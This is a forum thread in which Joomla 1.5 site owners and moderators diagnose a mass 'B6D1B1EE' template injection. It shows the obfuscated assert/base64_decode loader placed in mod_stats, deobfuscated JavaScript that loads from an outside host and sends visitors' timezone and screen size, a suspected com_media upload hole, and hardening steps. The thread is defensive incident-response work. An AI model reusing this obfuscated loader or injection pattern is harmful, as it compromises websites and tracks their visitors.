";} /*B6D1B1EE*/ ?> at top of site

Discussion regarding Joomla! 1.5 security issues.
Joomla! Vulnerable Extensions: http://feeds.joomla.org/JoomlaSecurityV ... Extensions

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
terryscott
Joomla! Apprentice
Joomla! Apprentice
Posts: 44
Joined: Mon Oct 03, 2011 10:17 am

";} /*B6D1B1EE*/ ?> at top of site

Post by terryscott » Mon Aug 29, 2016 4:42 pm

Hi there, today I noticed I have the text ";} /*B6D1B1EE*/ ?> right at the top of my site, I have googled this and it seems a lot of joomla 1.5 sites have this, but there is no discussion about it.

You can see the other sites in search results:
https://www.google.co.uk/#q=%22%3B%7D+% ... %2F+%3F%3E

I'd like to get rid of it and also know what it is, and help gratefully received!
Thanks
Terry

User avatar
dhuelsmann
Joomla! Master
Joomla! Master
Posts: 19643
Joined: Sun Oct 02, 2005 12:50 am
Location: Omaha, NE
Contact:

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by dhuelsmann » Mon Aug 29, 2016 4:57 pm

Since the 1.5.x series reached end of life in September 2012, my first guess is that your site has been hacked along with all the others you found.
Regards, Dave
Past Treasurer Open Source Matters, Inc.
Past Global Moderator
http://www.kiwaniswest.org

terryscott
Joomla! Apprentice
Joomla! Apprentice
Posts: 44
Joined: Mon Oct 03, 2011 10:17 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by terryscott » Mon Aug 29, 2016 5:48 pm

I have found it in my template index file, but can;t see any suspicious code near it, odd

terryscott
Joomla! Apprentice
Joomla! Apprentice
Posts: 44
Joined: Mon Oct 03, 2011 10:17 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by terryscott » Mon Aug 29, 2016 5:49 pm

dhuelsmann wrote:Since the 1.5.x series reached end of life in September 2012, my first guess is that your site has been hacked along with all the others you found.
Yeah I am unsure, I found the text in my templates index file, in this code:


require(YOURBASEPATH . DS . "rt_head_includes.php");
?>


";} /*B6D1B1EE*/ ?>
<?php /*d0eeaa88*/ if(is_object($_SESSION["__default"]["user"]) && !($_SESSION["__default"]["user"]->id)) {echo "


I can't see anything there that looks really suspicious however, can anyone else?

Thanks again

User avatar
dhuelsmann
Joomla! Master
Joomla! Master
Posts: 19643
Joined: Sun Oct 02, 2005 12:50 am
Location: Omaha, NE
Contact:

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by dhuelsmann » Mon Aug 29, 2016 5:54 pm

Use the site malware scanner at https://sitecheck.sucuri.net/
Regards, Dave
Past Treasurer Open Source Matters, Inc.
Past Global Moderator
http://www.kiwaniswest.org

terryscott
Joomla! Apprentice
Joomla! Apprentice
Posts: 44
Joined: Mon Oct 03, 2011 10:17 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by terryscott » Mon Aug 29, 2016 6:04 pm

Thanks for that, no malware found, but an alert to my outdated version of Joomla

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 14689
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by mandville » Mon Aug 29, 2016 6:37 pm

no malware found doesn't mean you weren't hacked. you could have been spam link defaced.
i searched that sequence and found that on every site i checked, they were running out of date joomla AND running mod_stats with a variation of statsr57.php or similar n

eg

Code: Select all

/media/stat522.php >
should be no where near the media directory
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

terryscott
Joomla! Apprentice
Joomla! Apprentice
Posts: 44
Joined: Mon Oct 03, 2011 10:17 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by terryscott » Mon Aug 29, 2016 6:44 pm

Thanks mandville, what would be your course of action? I will try and get the Joomla updated but in the mean time, I am unsure what to do.
I have removed the ";} /*B6D1B1EE*/ ?> from the index.php file and all seems OK, although I know that is just a work around

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 14689
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by mandville » Mon Aug 29, 2016 6:46 pm

i edited my post but you should really be looking for the r57 shell file. hints seem to point to php files in the media directory
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

terryscott
Joomla! Apprentice
Joomla! Apprentice
Posts: 44
Joined: Mon Oct 03, 2011 10:17 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by terryscott » Mon Aug 29, 2016 6:52 pm

mandville wrote:i edited my post but you should really be looking for the r57 shell file. hints seem to point to php files in the media directory
Thanks, there are no php files in the root of media, and the only text I see in the code near the issue is:


src=/modules/mod_stats/statd0e.php

That doesn't look right to me - I am not a programmer but will look at that file now

terryscott
Joomla! Apprentice
Joomla! Apprentice
Posts: 44
Joined: Mon Oct 03, 2011 10:17 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by terryscott » Mon Aug 29, 2016 6:54 pm

OK that file contains this:

<?php



$udinrg="\x61"."\x73"."\x73"."\x65".chr(114).chr(116);
$blmjnrcdi=chr(98)."a"."s"."e"."\x36"."\x34".chr(95)."d"."\x65".chr(99)."o"."\x64"."e";

@$udinrg(
@$blmjnrcdi(
'='));
## ###############################################################################
Last edited by mandville on Mon Aug 29, 2016 7:04 pm, edited 1 time in total.
Reason: Redacted hack code

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 14689
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by mandville » Mon Aug 29, 2016 7:24 pm

i redacted the code just in case. you should run and post the fpa so we can see what else is going on. or you could just follow the hacked site sticky and rebuild using the latest secure version
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

terryscott
Joomla! Apprentice
Joomla! Apprentice
Posts: 44
Joined: Mon Oct 03, 2011 10:17 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by terryscott » Mon Aug 29, 2016 7:42 pm

mandville wrote:i redacted the code just in case. you should run and post the fpa so we can see what else is going on. or you could just follow the hacked site sticky and rebuild using the latest secure version
Hi there, I have run the FAP, would you like me to PM you the url top it or paste any info here?
Thanks for the help so far, it really is appreciated.

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 14689
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by mandville » Mon Aug 29, 2016 7:53 pm

please post as per instructions
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

terryscott
Joomla! Apprentice
Joomla! Apprentice
Posts: 44
Joined: Mon Oct 03, 2011 10:17 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by terryscott » Mon Aug 29, 2016 8:10 pm

Forum Post Assistant (v1.2.7) : 29th August 2016 wrote:
Basic Environment :: wrote:Joomla! Instance :: Joomla! 1.5.26-Stable (senu takaa ama busani) 27-March-2012
Joomla! Configured :: Yes | Read-Only (444) | Owner: user_1075945597 (uid: 1/gid: 1) | Group: root (gid: 1) | Valid For: 1.5
Configuration Options :: Offline: 0 | SEF: 1 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: No | GZip: 0 | Cache: 0 | FTP Layer: 0 | SSL: 0 | Error Reporting: -1 | Site Debug: 0 | Language Debug: 0 | Database Credentials Present: Yes

Host Configuration :: OS: Linux | OS Version: 2.6.18-410.el5.centos.plus | Technology: x86_64 | Web Server: Apache | Encoding: gzip, deflate | Doc Root: /home/linweb32/t/mywebsiteaddress-1075945598/user/htdocs | System TMP Writable: Yes

PHP Configuration :: Version: 5.2.17 | PHP API: cgi-fcgi | Session Path Writable: Yes | Display Errors: | Error Reporting: 6143 | Log Errors To: | Last Known Error: | Register Globals: | Magic Quotes: | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 20M | Max. POST Size: 20M | Max. Input Time: 60 | Max. Execution Time: 60 | Memory Limit: 64M

MySQL Configuration :: Version: 5.0.95-log (Client:5.1.50) | Host: --protected-- (--protected--) | Collation: utf8_general_ci (Character Set: utf8) | Database Size: 62.57 MiB | #of Tables:  697
Detailed Environment :: wrote:PHP Extensions :: date (5.2.17) | libxml () | openssl () | pcre () | zlib (1.1) | bz2 () | calendar () | ctype () | curl () | hash (1.0) | filter (0.11.0) | ftp () | gettext () | gmp () | session () | iconv () | pcntl () | posix () | readline () | Reflection (0.1) | standard (5.2.17) | shmop () | SimpleXML (0.1) | SPL (0.2) | sockets () | exif (1.4 $Id: exif.c 293036 2010-01-03 09:23:27Z sebastian $) | sysvmsg () | sysvsem () | sysvshm () | tokenizer (0.1) | wddx () | xml () | cgi-fcgi () | bcmath () | dbase () | dom (20031129) | gd () | imap () | json (1.2.1) | mbstring () | mcrypt () | mysql (1.0) | mysqli (0.1) | PDO (1.0.4dev) | pdo_mysql (1.0.2) | pdo_pgsql (1.0.2) | pdo_sqlite (1.0.1) | pgsql () | soap () | xmlreader (0.1) | xmlrpc (0.51) | xmlwriter (0.1) | xsl (0.1) | zip (1.8.11) | ionCube Loader () | Zend Optimizer () | Zend Engine (2.2.0) |
Potential Missing Extensions :: suhosin |

Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: No | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: No
Folder Permissions :: wrote:Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |

Elevated Permissions (First 10) :: podcast/ (707) |
Extensions Discovered :: wrote:Components :: SITE :: Default (1.0.0) | User (1.5.0) | Wrapper (1.5.0) | MailTo (1.5.0) |
Components :: ADMIN :: Trash (1.0.0) | Language Manager (1.5.0) | Mass Mail (1.5.0) | Cache Manager (1.5.0) | PhocaGallery (2.8.1) | Akeeba (3.4.3) | RokCandy (0.87a) | Content Page (1.5.0) | AceSEF (1.5.20) | Mail To (1.5.1) | User (1.5.1) | Polls (1.5.0) | Wrapper (1.5.0) | AceSEF (1.5.1) | Banners (1.5.2) | Search (1.5.1) | Web Links (1.5.1) | Content (1.5.12) | Contact (1.5.3) | News Feeds (1.5.1) | Configuration Manager (1.5.0) | RokQuickCart (1.1) | Module Manager (1.5.0) | AcyMailing Tag : insert Virtue (1.2.1) | AcyMailing : share on social n (1.0.0) | AcyMailing Editor (beta) (4.7.2) | AcyMailing Manage text (1.0.0) | AcyMailing : Handle Click trac (3.0.0) | AcyMailing Tag : JomSocial Use (3.0.0) | AcyMailing Module (3.7.0) | AcyMailing Tag : Subscriber in (4.7.2) | AcyMailing Tag : Date / Time (4.7.2) | AcyMailing : Statistics Plugin (3.7.0) | AcyMailing Tag : Manage the Su (4.7.2) | AcyMailing Template Class Repl (4.7.2) | AcyMailing : trigger Joomla Co (3.7.0) | AcyMailing Tag : CB User infor (3.7.0) | AcyMailing Tag : VirtueMart pe (3.0.0) | AcyMailing table of contents g (1.0.0) | AcyMailing : (auto)Subscribe d (4.7.2) | AcyMailing Tag : Insert a Modu (3.0.0) | AcyMailing Tag : content inser (3.7.0) | AcyMailing Tag : Joomla User I (4.7.2) | AcyMailing Tag : Website links (3.7.0) | AcyMailing (4.7.2) | Contact Items (1.0.0) | Control Panel (1.5.0) | Frontpage (1.5.0) | Media Manager (1.5.0) | Weblinks (1.5.0) | Newsfeeds (1.5.0) | RokNavMenu Bundle (1.7.5) | CK Forms (1.3.5) | Template Manager (1.5.0) | Xmap (1.2.14) | JEvents Plugin (1.0.3) | lknAnswers Plugin (1.5.0) | DOCman Plugin (1.5.0) | Rokdownloads Plugin (1.0.4) | Kunena Plugin (1.0.2) | Agora Plugin (1.0.0) | JoomGallery Plugin (1.5.1) | Hot Property Plugin (1.0.1) | JMovies Plugin (1.5.0) | KnowledgeBase Plugin (1.0.0) | RD-Autos Plugin (1.5.0) | Mosets Tree Plugin (1.0.1) | MyBlog Plugin (1.5.1) | Remository Plugin (1.0.3) | JCALPro Plugin (1.0.0) | SectionEx Plugin (1.0.2) | Yoflash XMap Plugin (0.0.1) | AcyMailing Plugin (1.0.0) | Eventlist Plugin (1.0.0) | JoomSuite Resources Plugin (1.0.0) | Zoo Plugin (1.0.4) | CMS Shop Builder Plugin (1.5.0) | JoomDOC Extension (1.0.0) | SOBI2 Plugin (1.5.1) | Rapid Recipe Plugin (1.0.0) | Virtuemart Plugin (1.1.4) | Web Links Plugin (1.5.1) | Content Plugin (1.5.1) | RSGallery2 Extension (1.0.0) | JDownloads Plugin (1.5.1) | Gallery2 Bridge Plugin (1.0.2) | Contacts Plugin (1.0.1) | Jomres Plugin (1.0) | Glossary Plugin (1.5.2) | Banners (1.5.0) | Menus Manager (1.5.0) | User Manager (1.5.0) | Polls (1.5.0) | Error404 (2.7) | Installation Manager (1.5.0) | JCalPro (2.1.0 (build_) | Search (1.5.0) | RokModule (1.1) | Messaging (1.5.0) | Plugin Manager (1.5.0) |

Modules :: SITE :: Most Read Content (1.5.0) | Footer (1.5.0) | Countdown (0.0.8) | RokTabs (1.5) | RokStories (@VERSION@) | RokNavMenu (1.7.5) | ARI Image Slider (2.1.4) | JCal Pro Mini-calendar (2.1.0 (build_) | Share (1.0.0) | Feed Display (1.5.0) | Banner (1.5.0) | JS FlexSlider (1.1) | AcyMailing Module (3.7.0) | RokContentRotator (1.5) | ITPFacebookLikeBox (1.2) | Phoca Gallery Image Module (2.7.5) | RokMicroNews (1.1) | CKforms Form Display (1.3.4) | Login (1.5.0) | Breadcrumbs (1.5.0) | RokNewsPager (@VERSION@) | Search (1.0.0) | RokAjaxSearch (1.2) | Udjamaflip's Sociable Module b (1.5.0) | ValAddThis (2.5.2) | Variation Chooser (1.0.0) | Newsflash (1.5.0) | JCal Pro Latest Events (2.1.0 (build_) | Sections (1.5.0) | Who\'s Online (1.0.0) | Google Driving Directions (1.1) | Archived Content (1.5.0) | Random Image (1.5.0) | Poll (1.5.0) | Related Items (1.0.0) | Statistics (1.5.0) | mod_btslideshow (1.1.0) | ITPSocialButtons (1.5) | Custom HTML (1.5.0) | Follow Me (1.5.7) | ITPShare (1.8) | Latest News (1.5.0) | Syndicate (1.5.0) | Phoca Facebook Comments (1.0.7) | RokTwittie (0.1) | AlphaTwitter (1.0.2) | Menu (1.5.0) | Wrapper (1.0.0) | Rapid Contact (1.1) |
Modules :: ADMIN :: Quick Icons (1.0.0) | Footer (1.0.0) | Logged in Users (1.0.0) | Latest News (1.0.0) | AceSEF - Quick Icons (1.5.0) | Feed Display (1.5.0) | Admin Menu (1.0.0) | Login Form (1.0.0) | Unread Items (1.0.0) | Akeeba Backup Notification Mod (3.4.3) | User Status (1.5.0) | Items Stats (1.0.0) | Custom HTML (1.5.0) | Title (1.0.0) | Popular Items (1.0.0) | Toolbar (1.0.0) | Online Users (1.0.0) | Admin Submenu (1.0.0) |

Plugins :: SITE :: System - SEF (1.5) | System - Legacy (1.5) | Akeeba Backup Lazy Scheduling (3.3) | System - Log (1.5) | System - AceSEF Meta Manager ( (1.5.0) | System - RokGZipper (1.5) | System - Debug (1.5) | AcyMailing : (auto)Subscribe d (4.7.2) | System - Backlinks (1.5) | Google Maps (2.14) | System - RokCandy (0.87a) | System - AceSEF (1.5.0) | System - Remember Me (1.5) | System - RokBox (2.0) | System - Cache (1.5) | System - Canonicalization (-) | System - Mootools Upgrade (1.5) | Search - Weblinks (1.5) | Search - Sections (1.5) | Search - Categories (1.5) | Search - Contacts (1.5) | JCal Pro Search plugin (2.1.0 (build_) | Search - Content (1.5) | Search - Newsfeeds (1.5) | User - Example (1.0) | User - Joomla! (1.5) | Content - Load Modules (1.5) | ValAddThis (1.5.4) | Content - Perfect Link with Ar (2.0.12PRO) | Content - Slimbox (1.0) | Content - Example (1.0) | Content - CKforms Data Display (1.3.4) | JCalPro Latest Events plugin (2.1.0 (build_) | Phoca Gallery Plugin (2.7.7) | Content - Page Navigation (1.5) | Content - pPGallery (4.313) | Content - CKforms Form Display (1.3.4) | Content - Pagebreak (1.5) | Content - Vote (1.5) | Content - Email Cloaking (1.5) | Content - RokBox (1.4) | Simple Image Gallery (by Jooml (2.2) | Content - Code Highlighter (Ge (1.5) | load module into article (1.1.0) | AcyMailing Tag : insert Virtue (1.2.1) | AcyMailing Manage text (1.0.0) | AcyMailing : Statistics Plugin (3.7.0) | AcyMailing Tag : Manage the Su (4.7.2) | AcyMailing Tag : Date / Time (4.7.2) | AcyMailing Tag : JomSocial Use (3.0.0) | AcyMailing Tag : Website links (3.7.0) | AcyMailing Template Class Repl (4.7.2) | AcyMailing : share on social n (1.0.0) | AcyMailing table of contents g (1.0.0) | AcyMailing : Handle Click trac (3.0.0) | AcyMailing Tag : Joomla User I (4.7.2) | AcyMailing Tag : Insert a Modu (3.0.0) | AcyMailing Tag : VirtueMart pe (3.0.0) | AcyMailing Tag : Subscriber in (4.7.2) | AcyMailing Tag : CB User infor (3.7.0) | AcyMailing : trigger Joomla Co (3.7.0) | AcyMailing Tag : content inser (3.7.0) | Authentication - Example (1.5) | Authentication - LDAP (1.5) | Authentication - GMail (1.5) | Authentication - OpenID (1.5) | Authentication - Joomla (1.5) | Editor - RokPad (0.7) | AcyMailing Editor (beta) (4.7.2) | Editor - TinyMCE 3 (3.2.6) | Editor - XStandard Lite for Jo (1.0) | XML-RPC - Joomla API (1.0) | XML-RPC - Blogger API (1.0) | Button - RokCandy (0.87a) | Button - Image (1.0.0) | Button - Pagebreak (1.5) | Button - Readmore (1.5) | RokNavMenu - Boost (1.7.5) | RokNavMenu - Extended Link (1.7.5) |
Templates Discovered :: wrote:Templates :: SITE :: beez (1.0.0) | jTemplate (1.0.3) | rt_iridium_j15 (1.5.0) | rhuk_milkyway (1.0.2) | JA_Purity (1.2.0) |
Templates :: ADMIN :: Khepri (1.0) |

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 14689
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by mandville » Mon Aug 29, 2016 9:58 pm

summary
extensions out of date
folder podcast incorrect permission no related extension
php version out of date
etc
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

MiscCoder
Joomla! Fledgling
Joomla! Fledgling
Posts: 4
Joined: Tue Aug 30, 2016 2:30 pm

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by MiscCoder » Tue Aug 30, 2016 4:03 pm

Sites I maintain were also hit by this in the past 48 hours. This was embedded into every template, where XXX is a random 3 characters:
http://pastebin.com/redacted

The code that resides in the statXXX.php file unwraps to assert(base64decode(eval(base64decode(*stuff*)))) Then with a bit of cleanup and some deobfuscation (the comments are a part of the exploit code) we get:
http://pastebin.com/redacted

This is downloading from hxxp://redacted.net/id4.php the following:
http://pastebin.com/redacted

which then downloads this from hxxp://redacted.net/id4.php?id=4 :
http://pastebin.com/redacted

Which is just sending the timezone as UTC offset and screen resolution. It seems like whoever is executing this large scale attack doesn't really know what they are doing. Nothing harmful is actually occurring, it's super obvious when a site has been affected, and the code doesn't even work as expected. I'm still looking in to how this was embedded into the templates though.
Last edited by mandville on Tue Aug 30, 2016 4:34 pm, edited 1 time in total.
Reason: redacted link - do not link to hacking scripts

MiscCoder
Joomla! Fledgling
Joomla! Fledgling
Posts: 4
Joined: Tue Aug 30, 2016 2:30 pm

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by MiscCoder » Tue Aug 30, 2016 6:58 pm

Seeing as a mod gutted my previous post of all useful information, and I can't edit it, this should hopefully avoid "linking to hacking scripts" despite the fact that anything I linked to was the result of being hacked, not a script to hack a Joomla site in the first place. This is a potentially huge issue in the works and there needs to be some place to discuss it, seeing as this thread is the first 3 google results for "B6D1B1EE" this thread should provide the info required to diagnose and resolve this breach. 36 hours ago this affected 36,000 sites, 6 hours ago it affected 89,000 sites, now it is affecting 118,000 sites. While this intrusion itself isn't successfully doing anything, whatever entry point it is using is still there.

If your site is showing "B6D1B1EE" in the header you need to search every template for this code and remove it:

This is not a "hacking script," this is what every infected template needs have to removed from it, not making this information easily available is harmful to anyone who is forced to still maintain a Joomla 1.5 site
http://pastebin.com/CaP85wrM

You then need to remove the statXXX.php file that has been placed into your /modules/mod_stat/ directory. The script also places 2 files in your /tmp directory, but they are just used for storing timestamps, but feel free to empty that directory as well (it is just temporary after all).

The code that resides in the statXXX.php file unwraps to assert(base64decode(eval(base64decode(*stuff*)))) Then with a bit of cleanup and some deobfuscation we get some code that over complicates downloading a simple javascript file and attempting to embed it in the header of every page view. The code also leave dangling connections which results in the server;s memory being clogged more and more after every page view, restarting apache seemed to fix that.

The malicious code is downloading from hxxp://censored.net/id4.php the following:

This is not a "hacking script," it is a simple javascript include

Code: Select all

var script = document.getElementById("scriptData"); //createElement("script");


script.src="http://censored.net/js/analytic.php?id=4";

//document.head.appendChild(script);
which then downloads this from hxxp://censored.net/id4.php?id=4 :

This is not a "hacking script," it is simple javascript for getting the timezone and screen size

Code: Select all

<!--
function tzSignature() {
        var tz;
        try {
                var currDate = new Date();
                var currTime = currDate.toString();
                tz = currDate.getTimezoneOffset();
                if ( (currTime.indexOf("PDT") > 0) ||
                     (currTime.indexOf("MDT") > 0) ||
                     (currTime.indexOf("CDT") > 0) ||
                     (currTime.indexOf("EDT") > 0) ||
                     (currTime.indexOf("Daylight") > 0) )
                        tz += 60;
                tz = - tz / 60;
        } catch (e) {
                tz = "";
        }
        return tz;
}
 
function rsSignature() {
        var rs;
        try {
                var rsWidth = screen.width;
                var rsHeight = screen.height;
                var rs = rsWidth + "x" + rsHeight;
        } catch (e) {
                rs = "";
        }
        return rs;
}
 
var script = document.createElement("script");
 
script.src="http://censored.net//js/analytic.php?id=4&tz="+tzSignature()+'&rs='+rsSignature();
 
document.head.appendChild(script);
 
//document.write('<sc'+'ript type="text/javascript" src="http://censored.net//js/analytic.php?id=4&tz='+tzSig$
//-->
Which is just sending the timezone as UTC offset and screen resolution. It seems like whoever is executing this large scale attack doesn't really know what they are doing. Nothing harmful is actually occurring, it's super obvious when a site has been affected, and the code doesn't even work as expected. I've tried every UTC offset and every common desktop/tablet/phone resolution and in every attempt it just returns the exact same script, which if the exploit code was actually working as intended would loop infinitely.

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 14689
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by mandville » Tue Aug 30, 2016 7:47 pm

not sure why people are "forced " to still be running a 1.5 site. perhaps he same people who are using samsung s2, iphone5, htc wildfire, windows xp or leaded petrol etc [analogy]
as you state we dont allow links to any code that can be used for illegal means.

as stated in previous posts. out of date joomla, possibly out of date php, possibly out of date extensions.
what do you have in common with the OP beyond using 1.5 ?
https://docs.joomla.org/Security_Checkl ... or_defaced is where you should be heading next
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

MiscCoder
Joomla! Fledgling
Joomla! Fledgling
Posts: 4
Joined: Tue Aug 30, 2016 2:30 pm

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by MiscCoder » Tue Aug 30, 2016 8:11 pm

Several clients of the company I work for are small pro-bono/non-profit clients that have zero budget to pay us to update their sites, sites which were established in the mid 2000's. If it were up to me they wouldn't still be on 1.5.26

All server software is up to date, this is an exploit that exists in Joomla 1.5.26. The modifications to the templates, /modules/mod_stat/statXXX.php file, and 2 files in the /tmp directory are the only changes this intrusion has made. Since my last post the number of results on google for "B6D1B1EE" has grown by another 4000.

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 14689
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by mandville » Tue Aug 30, 2016 8:31 pm

are the sites you have on 1.5 with the 1.5.26+ patch (or what ever people called it) tht was issued after EOL http://joomlacode.org/gf/project/joomla ... m_id=31626
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

User avatar
ozneilau
Joomla! Guru
Joomla! Guru
Posts: 857
Joined: Tue Aug 04, 2009 9:05 am
Location: Tasmania, Australia
Contact:

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by ozneilau » Wed Aug 31, 2016 12:37 pm

mandville wrote:are the sites you have on 1.5 with the 1.5.26+ patch (or what ever people called it) that was issued after EOL
There are 2 x security hotfixes for Joomla 1.5.26, the Session Hardening patch and the File Upload Security patch which can be found at: https://docs.joomla.org/Security_hotfix ... L_versions

harps_kal
Joomla! Fledgling
Joomla! Fledgling
Posts: 3
Joined: Wed Aug 31, 2016 11:02 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by harps_kal » Wed Aug 31, 2016 4:21 pm

Hello all,

Im pretty new to Joomla having been told to fix this issue this morning (pretty stressed).

I actually have the ;} /*B6D1B1EE*/ ?> issue as well as someone POST'ing to Joomla to send spam.

As of this momment, Ive deleted Joomla and turned the DB off.

Am I still vulnerable to the exploit?

I can see IP's trying to POST to /libraries/phpxmlrpc/compat/article48.php ...obviously failing because Joomla is no longer there.

cheers in advance

harps_kal
Joomla! Fledgling
Joomla! Fledgling
Posts: 3
Joined: Wed Aug 31, 2016 11:02 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by harps_kal » Wed Aug 31, 2016 4:29 pm

Actually when I say "Am I still vulnerable to the exploit?" .... I mean what else should I be afraid of?

terryscott
Joomla! Apprentice
Joomla! Apprentice
Posts: 44
Joined: Mon Oct 03, 2011 10:17 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by terryscott » Wed Aug 31, 2016 5:00 pm

MiscCoder wrote:Seeing as a mod gutted my previous post of all useful information, and I can't edit it, this should hopefully avoid "linking to hacking scripts" despite the fact that anything...
Thanks for all this!
I have removed the statd0e.php file, I had nothing in my temp folder, but from what you say this is a pretty badly written nasty, so no surprises there I guess.

I've checked everything else out and made another backup just in case.

Again, thank you.

terryscott
Joomla! Apprentice
Joomla! Apprentice
Posts: 44
Joined: Mon Oct 03, 2011 10:17 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by terryscott » Wed Aug 31, 2016 5:02 pm

MiscCoder wrote:Several clients of the company I work for are small pro-bono/non-profit clients that have zero budget to pay us to update their sites, sites which were established in the mid 2000's. If it were up to me they wouldn't still be on 1.5.26

All server software is up to date, this is an exploit that exists in Joomla 1.5.26. The modifications to the templates, /modules/mod_stat/statXXX.php file, and 2 files in the /tmp directory are the only changes this intrusion has made. Since my last post the number of results on google for "B6D1B1EE" has grown by another 4000.
I agree with this, and this is my situation too.
The simple fact is there are a lot of people on 1.5 who don't have the budget to upgrade.

I will however push them to do so after this, hopefully they listen.

User avatar
fcoulter
Joomla! Ace
Joomla! Ace
Posts: 1668
Joined: Thu Sep 13, 2007 11:39 am
Location: UK
Contact:

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by fcoulter » Thu Sep 01, 2016 8:07 pm

I have been looking into this issue on behalf of the VEL since this morning. It seems that the actual script injected doesn't do anything dangerous, either because the attacker was not very competent, or maybe just wanted a proof of concept. That is just our good luck, we should definitely be very worried about this. From the number of sites affected it is obvious that this is an automated attack, and therefore it seems could easily be replicated, except with some real malware next time.

It seems that the attack involves adding a php file to mod stats. I have checked the module, I cannot find any obvious weakness in it, it is most likely that it is just a convenient place to try to hide a file and nothing to do with the module itself.

I think that by far the most likely way that this attack is accomplished is through the known vulnerability in com_media which was discovered back in 2013, which uses an empty file extension to bypass the normal file checks.

So how to protect against the attack?

The most preferred option is to update your site to the latest Joomla, 3.6.2, it is much more secure. However it is quite a complex migration path from 1.5 to 3.6, and inevitably takes time. It seems to me that there are some basic security hardening steps that you can take that should offer some protection against the com_media hack in the meantime.

1. Update your site to the latest version of 1.5, that is 1.5.26, unless someone has been hacking the core code that ought to be possible;

2. apply the file upload vulnerability patch, it is available here at the bottom of the page: http://joomlacode.org/gf/project/joomla ... m_id=31626

3. in the Joomla configuration, make sure that user registration is disabled; unfortunately by default in J1.5 anyone can create an active account on your site unless you disallow it; unless of course this is impossible, for example on an e-commerce store;

4. in the com_media options, make sure that the Restrict Uploads option is set to "YES"
5. also in the com_media options, set Check Mime Type to "NO", this may seem counterintuitive, but what this does is it restricts uploads of non-image files to administrators only
[/list]

To explain why I am suggesting these steps:-

The basic problem is weak ACL in com_media in Joomla 1.5, any registered user can access the file controller upload task, and anyone by default can register themselves as a user. Then whether a file can be uploaded only depends on the canUpload() test in com_media/helpers/media.php, it is that test the empty file extension vulnerability managed to exploit.

The Mime Check option matters because as a test it is very weak in fact completely useless as far as security is concerned: a PHP file would pass it, so it is much better to turn it off and instead restrict uploads to those with admin login privileges (managers, administrators and super users).

Still it is far better to migrate your site to Joomla 3, even if you manage to patch all the security issues in the Joomla Core you will still probably have extensions that contain vulnerabilities.

User avatar
fcoulter
Joomla! Ace
Joomla! Ace
Posts: 1668
